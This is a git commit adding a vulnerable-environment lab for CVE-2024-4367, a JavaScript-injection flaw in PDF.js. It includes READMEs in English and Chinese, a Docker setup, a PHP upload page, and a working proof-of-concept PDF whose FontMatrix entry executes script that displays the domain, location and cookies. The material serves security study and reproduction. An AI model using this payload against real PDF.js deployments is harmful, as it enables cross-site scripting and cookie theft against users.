first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/pdfjs/CVE-2024-4367/1.png
+++ b/pdfjs/CVE-2024-4367/1.png
--- a/pdfjs/CVE-2024-4367/README.md
+++ b/pdfjs/CVE-2024-4367/README.md
@@ -0,0 +1,27 @@
+# PDF.js Arbitrary JavaScript Code Execution (CVE-2024-4367)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+PDF.js is a Portable Document Format (PDF) viewer that is built with HTML5.
+
+In the PDF.js version prior to 4.1.392, a JavaScript code injection was found. This bug allows an attacker to execute arbitrary JavaScript code as soon as a malicious PDF file is opened.
+
+References:
+
+- <https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/>
+
+## Vulnerable environment
+
+Execute following command to start a server that contains PDF.js 4.1.392:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse `http://your-ip:8080` you will see an uploading page.
+
+## Vulnerability reproduce
+
+Upload malicious PDF file [poc.pdf](poc.pdf) to trigger the XSS:
+
+![](1.png)
--- a/pdfjs/CVE-2024-4367/README.zh-cn.md
+++ b/pdfjs/CVE-2024-4367/README.zh-cn.md
@@ -0,0 +1,25 @@
+# PDF.js 任意JavaScript代码执行（CVE-2024-4367）
+
+PDF.js是Mozilla推出的一款开源PDF文件阅读器。
+
+其4.1.392版本及以前，PDF.js中存在一处JavaScript代码注入漏洞。
+
+参考链接：
+
+- <https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/>
+
+## 漏洞环境
+
+执行如下命令启动一个使用了PDF.js 4.1.392的服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`你可以看到一个上传页面。
+
+## 漏洞复现
+
+上传恶意PDF文件[poc.pdf](poc.pdf)，即可触发XSS弹窗：
+
+![](1.png)
--- a/pdfjs/CVE-2024-4367/docker-compose.yml
+++ b/pdfjs/CVE-2024-4367/docker-compose.yml
@@ -0,0 +1,8 @@
+version: '2'
+services:
+ web:
+   image: vulhub/pdfjs:4.1.392
+   volumes:
+    - ./index.php:/var/www/html/index.php
+   ports:
+    - "8080:80"
--- a/pdfjs/CVE-2024-4367/index.php
+++ b/pdfjs/CVE-2024-4367/index.php
@@ -0,0 +1,33 @@
+<?php
+if (!empty($_FILES)):
+
+// Check for errors
+if($_FILES['file_upload']['error'] > 0){
+    die('An error ocurred when uploading.');
+}
+
+// Check filesize
+if(!is_uploaded_file($_FILES['file_upload']['tmp_name'])) {
+    die('File is not uploaded file');
+}
+
+$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
+if ($ext !== 'pdf') {
+    die('Unsupported filetype uploaded.');
+}
+
+$new_name = uniqid() . '.pdf';
+if(!move_uploaded_file($_FILES['file_upload']['tmp_name'], __DIR__ . '/upload/' . $new_name)){
+    die('Error uploading file - check destination is writeable.');
+}
+
+header('Location: /web/viewer.html?file=../upload/' . $new_name, true, 302);
+exit;
+else:
+?>
+<form method="post" enctype="multipart/form-data">
+    File: <input type="file" name="file_upload">
+    <input type="submit">
+</form>
+<?php
+endif;
--- a/pdfjs/CVE-2024-4367/poc.pdf
+++ b/pdfjs/CVE-2024-4367/poc.pdf
@@ -0,0 +1,154 @@
+%PDF-1.4
+%
+8 0 obj
+<<
+/PatternType 2
+/Shading<<
+  /Function<<
+    /Domain[0 1]
+    /C0[0 0 1]
+    /C1[1 0.6 0]
+    /N 1
+    /FunctionType 2
+  >>
+  /ShadingType 2
+  /Coords[46 400 537 400]
+  /Extend[false false]
+  /ColorSpace/DeviceRGB
+>>
+/Type/Pattern
+>>
+endobj
+5 0 obj
+<<
+/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 573 0 573 0 341]
+/Type/Font
+/BaseFont/PAXEKO+SourceSansPro-Bold
+/LastChar 102
+/Encoding/WinAnsiEncoding
+/FontMatrix [0.1 0 0 0.1 0 (1\); \nalert\('document.domain: '+window.document.domain+'\\nlocation: '+window.location+'\\ncookie: '+window.document.cookie)]
+/Subtype/Type1
+/FirstChar 65
+/FontDescriptor 9 0 R
+>>
+endobj
+2 0 obj
+<<
+/Kids[3 0 R]
+/Type/Pages
+/Count 1
+>>
+endobj
+9 0 obj
+<<
+/Type/FontDescriptor
+/ItalicAngle 0
+/Ascent 751
+/FontBBox[-6 -12 579 713]
+/FontName/PAXEKO+SourceSansPro-Bold
+/StemV 100
+/CapHeight 713
+/Flags 32
+/FontFile3 10 0 R
+/Descent -173
+/MissingWidth 250
+>>
+endobj
+6 0 obj
+<<
+/Length 128
+>>
+stream
+47 379 489 230 re S
+/Pattern cs
+BT
+  50 500 Td
+  117 TL
+  /F1 150 Tf
+  /P1 scn
+  (AbCdEf) Tj
+  /P2 scn
+  (AbCdEf) '
+ET
+endstream
+endobj
+3 0 obj
+<<
+/Type/Page
+/Resources 4 0 R
+/Contents 6 0 R
+/Parent 2 0 R
+/MediaBox[0 0 595.2756 841.8898]
+>>
+endobj
+10 0 obj
+<<
+/Length 800
+/Subtype/Type2
+>>
+stream
+
+endstream
+endobj
+7 0 obj
+<<
+/PatternType 1
+/Matrix[1 0 0 1 50 0]
+/Length 58
+/TilingType 1
+/BBox[0 0 16 16]
+/YStep 16
+/PaintType 1
+/Resources<<
+>>
+/XStep 16
+>>
+stream
+0.65 g
+0 0 16 16 re f
+0.15 g
+0 0 8 8 re f
+8 8 8 8 re f
+endstream
+endobj
+4 0 obj
+<<
+/Pattern<<
+  /P1 7 0 R
+  /P2 8 0 R
+>>
+/Font<<
+  /F1 5 0 R
+>>
+>>
+endobj
+1 0 obj
+<<
+/Pages 2 0 R
+/Type/Catalog
+/OpenAction[3 0 R /Fit]
+>>
+endobj
+
+xref
+0 11
+0000000000 65535 f 
+0000002260 00000 n 
+0000000522 00000 n 
+0000000973 00000 n 
+0000002178 00000 n 
+0000000266 00000 n 
+0000000794 00000 n 
+0000001953 00000 n 
+0000000015 00000 n 
+0000000577 00000 n 
+0000001085 00000 n 
+trailer
+<<
+/ID[(w4f) (w4f)]
+/Root 1 0 R
+/Size 11
+>>
+startxref
+2333
+%%EOF